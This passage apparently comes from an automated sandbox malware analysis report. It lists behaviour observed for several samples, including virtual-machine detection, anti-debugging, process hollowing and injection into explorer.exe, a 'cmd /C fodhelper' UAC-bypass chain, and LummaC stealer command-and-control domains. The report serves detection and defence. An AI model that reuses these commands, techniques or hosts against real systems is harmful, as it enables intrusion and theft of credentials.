            Source: 71C9.exe, 0000001D.00000002.3185463938.0000000003190000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: &gt;&lt;'\'') = ) m=+Inf-Inf.bat.cmd.com.css.exe.gif.htm.jpg.mjs.pdf.png.svg.sys.xml0x%x1.1110803125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCDN=CESTChamDATADashDataDateEESTEULAEtagFromGOGCGoneHostJulyJuneLEAFLisuMiaoModiNZDTNZSTNameNewaPINGPOSTPathQEMUROOTSASTSTARSendStatTempThaiTypeUUID"%s"\rss\smb\u00
            Source: A0B.exe, 00000017.00000003.3024777323.0000000003AD7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
            Source: 71C9.exe, 0000001D.00000002.3181347032.0000000002D88000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: \\.\HGFS`
            Source: explorer.exe, 00000022.00000003.3298895150.000000000C16B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\My9}
            Source: explorer.exe, 00000022.00000003.4414268907.000000000952E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
            Source: DB15.exe, 00000013.00000002.4525021781.0000000003100000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: explorer.exe, 00000002.00000000.2110113315.0000000009605000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
            Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: explorer.exe, 00000022.00000003.4418026226.000000000943F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMWare
            Source: 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: m=] = ] n=allgallparchasn1avx2basebindbitsbmi1bmi2boolcallcap cas1cas2cas3cas4cas5cas6chandatedeaddialdoneermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (at ...
            Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
            Source: explorer.exe, 00000022.00000003.3298503526.000000000C1FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000u
            Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: explorer.exe, 00000022.00000002.4516726316.0000000001453000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeAPI call chain: ExitProcess graph end nodegraph_12-45121
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeSystem information queried: ModuleInformationJump to behavior
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeSystem information queried: CodeIntegrityInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\gtdiratSystem information queried: CodeIntegrityInformationJump to behavior
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Roaming\gtdiratProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_027D171C rdtsc 11_2_027D171C
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_00408F94 IsDebuggerPresent,11_2_00408F94
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_0042A57A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,12_2_0042A57A
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_00481920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,17_2_00481920
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_00412220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,CloseHandle,12_2_00412220
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeCode function: 0_2_00C20D90 mov eax, dword ptr fs:[00000030h]0_2_00C20D90
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeCode function: 0_2_00C2092B mov eax, dword ptr fs:[00000030h]0_2_00C2092B
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeCode function: 0_2_00D26106 push dword ptr fs:[00000030h]0_2_00D26106
            Source: C:\Users\user\AppData\Roaming\gtdiratCode function: 6_2_00C70D90 mov eax, dword ptr fs:[00000030h]6_2_00C70D90
            Source: C:\Users\user\AppData\Roaming\gtdiratCode function: 6_2_00C7092B mov eax, dword ptr fs:[00000030h]6_2_00C7092B
            Source: C:\Users\user\AppData\Roaming\gtdiratCode function: 6_2_00CB3CF6 push dword ptr fs:[00000030h]6_2_00CB3CF6
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_027D00A3 push dword ptr fs:[00000030h]11_2_027D00A3
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_02870042 push dword ptr fs:[00000030h]11_2_02870042
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 16_2_027D60A3 push dword ptr fs:[00000030h]16_2_027D60A3
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 16_2_02870042 push dword ptr fs:[00000030h]16_2_02870042
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_00408A9A GetProcessHeap,11_2_00408A9A
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_00408268 SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00408268
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_004329EC
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_004329BB SetUnhandledExceptionFilter,12_2_004329BB
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_004329EC
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_004329BB SetUnhandledExceptionFilter,17_2_004329BB

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Benign windows process drops PE files
            Source: C:\Windows\explorer.exeFile created: DB15.exe.2.drJump to dropped file
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exeNetwork Connect: 172.67.156.20 443Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 81.94.159.197 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 189.232.22.59 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 172.253.115.138 443Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 192.185.16.114 443Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 162.159.129.233 443Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 103.23.232.80 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 172.67.207.127 443Jump to behavior
            Contains functionality to inject code into remote processes
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_02870110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,11_2_02870110
            Creates a thread in another existing process (thread injection)
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeThread created: C:\Windows\explorer.exe EIP: 2DF19A0Jump to behavior
            Source: C:\Users\user\AppData\Roaming\gtdiratThread created: unknown EIP: 2F519A0Jump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeMemory written: C:\Users\user\AppData\Local\Temp\DB15.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeMemory written: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeMemory written: C:\Users\user\AppData\Local\Temp\DB15.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeMemory written: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeMemory written: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeMemory written: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build3.exeMemory written: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build3.exe base: 400000 value starts with: 4D5A
            LummaC encrypted strings found
            Source: A0B.exe, 00000017.00000002.3117753421.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: associationokeo.shop
            Source: A0B.exe, 00000017.00000002.3117753421.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: turkeyunlikelyofw.shop
            Source: A0B.exe, 00000017.00000002.3117753421.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: pooreveningfuseor.pw
            Source: A0B.exe, 00000017.00000002.3117753421.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: edurestunningcrackyow.fun
            Source: A0B.exe, 00000017.00000002.3117753421.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: detectordiscusser.shop
            Source: A0B.exe, 00000017.00000002.3117753421.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: problemregardybuiwo.fun
            Source: A0B.exe, 00000017.00000002.3117753421.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: lighterepisodeheighte.fun
            Source: A0B.exe, 00000017.00000002.3117753421.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: technologyenterdo.shop
            Source: A0B.exe, 00000017.00000002.3117753421.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: resergvearyinitiani.shop
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
            Source: C:\Users\user\AppData\Roaming\gtdiratSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\gtdiratSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
            Sample uses process hollowing technique
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build3.exeSection unmapped: unknown base address: 400000
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,12_2_00419F90
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeProcess created: C:\Users\user\AppData\Local\Temp\DB15.exe C:\Users\user\AppData\Local\Temp\DB15.exeJump to behavior
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeProcess created: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe --TaskJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeProcess created: C:\Users\user\AppData\Local\Temp\DB15.exe "C:\Users\user\AppData\Local\Temp\DB15.exe" --Admin IsNotAutoStart IsNotTask
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeProcess created: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe "C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe"
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeProcess created: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build3.exe "C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build3.exe"
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeProcess created: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe "C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe" --AutoStart
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeProcess created: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe "C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe" --AutoStart
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe fodhelper
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeProcess created: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe "C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe"
            Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Users\user\AppData\Local\Temp\71C9.exe "C:\Users\user\AppData\Local\Temp\71C9.exe"
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build3.exeProcess created: unknown unknown
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
            Source: explorer.exe, 00000002.00000000.2107021986.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
            Source: explorer.exe, 00000022.00000002.4516726316.0000000001430000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +ProgmanC
            Source: explorer.exe, 00000002.00000000.2107021986.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2107887312.00000000048E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000002.00000000.2107021986.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000022.00000002.4531229411.00000000053B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000002.00000000.2106796270.0000000000D69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +Progman
            Source: explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanC
            Source: explorer.exe, 00000002.00000000.2107021986.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: explorer.exe, 00000002.00000000.2110427730.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd31A
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_028980F6 cpuid 11_2_028980F6
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,11_2_028B0AB6
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,11_2_0289C8B7
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,11_2_028A49EA
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,11_2_028A394D
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,11_2_028A3F87
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,12_2_0043404A
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,12_2_00438178
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,12_2_00440116
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,12_2_004382A2
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: GetLocaleInfoW,_GetPrimaryLen,12_2_0043834F
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,12_2_00438423
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: EnumSystemLocalesW,12_2_004387C8
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: GetLocaleInfoW,12_2_0043884E
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,12_2_00432B6D
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,12_2_00432FAD
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,12_2_004335E7
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,12_2_00437BB3
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: EnumSystemLocalesW,12_2_00437E27
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,12_2_00437E83
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,12_2_00437F00
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,12_2_0042BF17
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,12_2_00437F83
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,16_2_028B0AB6
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,16_2_0289C8B7
